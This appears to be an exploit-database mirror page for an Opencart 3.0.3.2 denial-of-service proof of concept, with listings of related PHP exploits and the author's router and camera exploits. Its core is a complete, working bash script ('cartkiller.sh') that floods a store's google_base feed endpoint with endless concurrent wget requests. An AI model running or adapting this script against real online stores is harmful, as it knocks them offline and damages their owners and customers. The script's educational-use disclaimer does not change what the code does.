Menu

Improved exploit search engine. Try it out

"Opencart 3.0.3.2 - 'extension/feed/google_base' Denial of Service PoC"

Author

"Todor Donev"

Platform

php

Release date

2019-05-24

Release Date Title Type Platform Author
2019-06-12 "FusionPBX 4.4.3 - Remote Command Execution" webapps php "Dustin Cobb"
2019-06-11 "phpMyAdmin 4.8 - Cross-Site Request Forgery" webapps php Riemann
2019-06-11 "WordPress Plugin Insert or Embed Articulate Content into WordPress - Remote Code Execution" webapps php xulchibalraa
2019-06-10 "UliCMS 2019.1 'Spitting Lama' - Persistent Cross-Site Scripting" webapps php Unk9vvN
2019-06-04 "IceWarp 10.4.4 - Local File Inclusion" webapps php JameelNabbo
2019-06-03 "WordPress Plugin Form Maker 1.13.3 - SQL Injection" webapps php "Daniele Scanu"
2019-06-03 "KACE System Management Appliance (SMA) < 9.0.270 - Multiple Vulnerabilities" webapps php SlidingWindow
2019-05-29 "pfSense 2.4.4-p3 (ACME Package 0.59_14) - Persistent Cross-Site Scripting" webapps php "Chi Tran"
2019-05-24 "Opencart 3.0.3.2 - 'extension/feed/google_base' Denial of Service PoC" webapps php "Todor Donev"
2019-05-23 "Nagios XI 5.6.1 - SQL injection" webapps php JameelNabbo
2019-05-22 "Horde Webmail 5.2.22 - Multiple Vulnerabilities" webapps php InfinitumIT
2019-05-21 "WordPress Plugin WPGraphQL 0.2.3 - Multiple Vulnerabilities" webapps php "Simone Quatrini"
2019-05-21 "Moodle Jmol Filter 6.1 - Directory Traversal / Cross-Site Scripting" webapps php "Dionach Ltd"
2019-05-23 "Shopware - createInstanceFromNamedArguments PHP Object Instantiation Remote Code Execution (Metasploit)" remote php Metasploit
2019-05-20 "eLabFTW 1.8.5 - Arbitrary File Upload / Remote Code Execution" webapps php liquidsky
2019-05-20 "GetSimpleCMS - Unauthenticated Remote Code Execution (Metasploit)" remote php Metasploit
2019-05-17 "Interspire Email Marketer 6.20 - 'surveys_submit.php' Remote Code Execution" webapps php "numan türle"
2019-05-16 "DeepSound 1.0.4 - SQL Injection" webapps php "Mehmet EMIROGLU"
2019-05-15 "Legrand BTicino Driver Manager F454 1.0.51 - Cross-Site Request Forgery / Cross-Site Scripting" webapps php LiquidWorm
2019-05-15 "CommSy 8.6.5 - SQL injection" webapps php "Jens Regel_ Schneider_ Wulf"
2019-05-14 "PasteShr 1.6 - Multiple SQL Injection" webapps php "Mehmet EMIROGLU"
2019-05-14 "Schneider Electric U.Motion Builder 1.3.4 - 'track_import_export.php object_id' Unauthenticated Command Injection" webapps php "Julien Ahrens"
2019-05-14 "Sales ERP 8.1 - Multiple SQL Injection" webapps php "Mehmet EMIROGLU"
2019-05-14 "PHP-Fusion 9.03.00 - 'Edit Profile' Remote Code Execution (Metasploit)" remote php AkkuS
2019-05-13 "OpenProject 5.0.0 - 8.3.1 - SQL Injection" webapps php "SEC Consult"
2019-05-13 "XOOPS 2.5.9 - SQL Injection" webapps php "felipe andrian"
2019-05-13 "SOCA Access Control System 180612 - Cross-Site Request Forgery (Add Admin)" webapps php LiquidWorm
2019-05-13 "SOCA Access Control System 180612 - SQL Injection" webapps php LiquidWorm
2019-05-13 "SOCA Access Control System 180612 - Information Disclosure" webapps php LiquidWorm
2019-05-09 "Zoho ManageEngine ADSelfService Plus 5.7 < 5702 build - Cross-Site Scripting" webapps php "Ibrahim Raafat"
Release Date Title Type Platform Author
2019-05-24 "Opencart 3.0.3.2 - 'extension/feed/google_base' Denial of Service PoC" webapps php "Todor Donev"
2018-04-02 "Secutech RiS-11/RiS-22/RiS-33 - Remote DNS Change" webapps hardware "Todor Donev"
2018-03-30 "Tenda W3002R/A302/w309r Wireless Router v5.07.64_en - Remote DNS Change (PoC)" webapps asp "Todor Donev"
2018-03-30 "Tenda FH303/A300 Firmware v5.07.68_EN - Remote DNS Change" webapps asp "Todor Donev"
2018-03-30 "Tenda W316R Wireless Router 5.07.50 - Remote DNS Change" webapps asp "Todor Donev"
2018-03-30 "Tenda W308R v2 Wireless Router 5.07.48 - Cookie Session Weakness Remote DNS Change" webapps asp "Todor Donev"
2018-03-28 "Tenda N11 Wireless Router 5.07.43_en_NEX01 - Remote DNS Change" webapps hardware "Todor Donev"
2017-06-18 "D-Link DSL-2640B ADSL Router - 'dnscfg' Remote DNS Change" webapps hardware "Todor Donev"
2017-06-17 "Beetel BCM96338 Router - DNS Change" webapps hardware "Todor Donev"
2017-06-17 "D-Link DSL-2640U - DNS Change" webapps hardware "Todor Donev"
2017-06-17 "UTstarcom WA3002G4 - DNS Change" webapps hardware "Todor Donev"
2017-06-16 "iBall Baton iB-WRA150N - DNS Change" webapps hardware "Todor Donev"
2017-01-19 "Pirelli DRG A115 v3 ADSL Router - DNS Change" webapps hardware "Todor Donev"
2017-01-19 "Tenda ADSL2/2+ Modem D820R - DNS Change" webapps hardware "Todor Donev"
2017-01-16 "Tenda ADSL2/2+ Modem D840R - DNS Change" webapps hardware "Todor Donev"
2017-01-16 "Pirelli DRG A115 ADSL Router - DNS Change" webapps hardware "Todor Donev"
2018-01-17 "D-Link DSL-2640R - DNS Change" webapps hardware "Todor Donev"
2016-08-19 "MESSOA IP Cameras (Multiple Models) - Password Change" webapps cgi "Todor Donev"
2016-08-19 "MESSOA IP-Camera NIC990 - Authentication Bypass / Configuration Download" webapps cgi "Todor Donev"
2016-08-19 "TOSHIBA IP-Camera IK-WP41A - Authentication Bypass / Configuration Download" webapps cgi "Todor Donev"
2016-08-18 "SIEMENS IP Camera CCMW1025 x.2.2.1798 - Remote Admin Credentials Change" webapps cgi "Todor Donev"
2016-08-19 "SIEMENS IP Cameras (Multiple Models) - Credential Disclosure / Configuration Download" webapps cgi "Todor Donev"
2015-10-06 "ZTE ZXHN H108N Router - Configuration Disclosure" webapps hardware "Todor Donev"
2015-06-08 "D-Link DSL-526B ADSL2+ AU_2.01 - Remote DNS Change" webapps hardware "Todor Donev"
2015-06-08 "D-Link DSL-2730B AU_2.01 - Authentication Bypass DNS Change" webapps hardware "Todor Donev"
2015-06-08 "TP-Link TD-W8950ND ADSL2+ - Remote DNS Change" webapps hardware "Todor Donev"
2015-06-08 "D-Link DSL-2780B DLink_1.01.14 - Remote DNS Change" webapps hardware "Todor Donev"
2015-06-06 "Broadlight Residential Gateway DI3124 - Remote DNS Change" webapps hardware "Todor Donev"
2011-11-04 "DreamBox DM800 - 'file' Local File Disclosure" webapps hardware "Todor Donev"
2015-02-18 "D-Link DSL-2640B ADSL Router - 'ddnsmngr' Remote DNS Change" webapps hardware "Todor Donev"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46921/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46921/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46921/41355/opencart-3032-extensionfeedgoogle_base-denial-of-service-poc/download/", "exploit_id": "46921", "exploit_description": "\"Opencart 3.0.3.2 - 'extension/feed/google_base' Denial of Service PoC\"", "exploit_date": "2019-05-24", "exploit_author": "\"Todor Donev\"", "exploit_type": "webapps", "exploit_platform": "php", "exploit_port": null}
                                            

For full documentation follow the link above

Browse exploit DB API Browse

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
#!/bin/bash
#
#  Opencart <= 3.0.3.2 'extension/feed/google_base' Remote Denial of Service PoC exploit
#
#  Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#  PoC exploit, just for test...
#  Tested on store with added more than 1000 products
#  Usage: ./cartkiller.sh store_url threads sleep
#  Example: ./cartkiller.sh https://store_name 50 5
#
#
#  Disclaimer:
#  This or previous programs is for Educational 
#  purpose ONLY. Do not use it without permission. 
#  The usual disclaimer applies, especially the 
#  fact that Todor Donev is not liable for any 
#  damages caused by direct or indirect use of the 
#  information or functionality provided by these 
#  programs. The author or any Internet provider 
#  bears NO responsibility for content or misuse 
#  of these programs or any derivatives thereof.
#  By using these programs you accept the fact 
#  that any damage (dataloss, system crash, 
#  system compromise, etc.) caused by the use 
#  of these programs is not Todor Donev's 
#  responsibility.
#   
#  Use them at your own risk!
#

echo "Opencart <= 3.0.3.2 'extension/feed/google_base' Remote Denial of Service PoC exploit"
echo
echo "Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>"
echo
echo "PoC exploit, just for test..."
echo "Tested on store with added more than 1000 products"

if [ -z "$3" ]; then
echo Usage: "$0" store_url threads sleep
echo Example: "$0" https://store_name 50 5
exit 4
fi
 
url="$1"
threads="$2"
sleep="$3"
while :
do
        for ((i=1;i<=$2;i++)); 
        do 	
	    wget "$url/index.php?route=extension/feed/google_base" --user-agent="Mozilla/5.0 (OpenCart Killer v2 google_base Denial Of Service)" --quiet -O /dev/null -o /dev/null &
        done
#
# Sleep between loops..
#      
sleep $sleep
done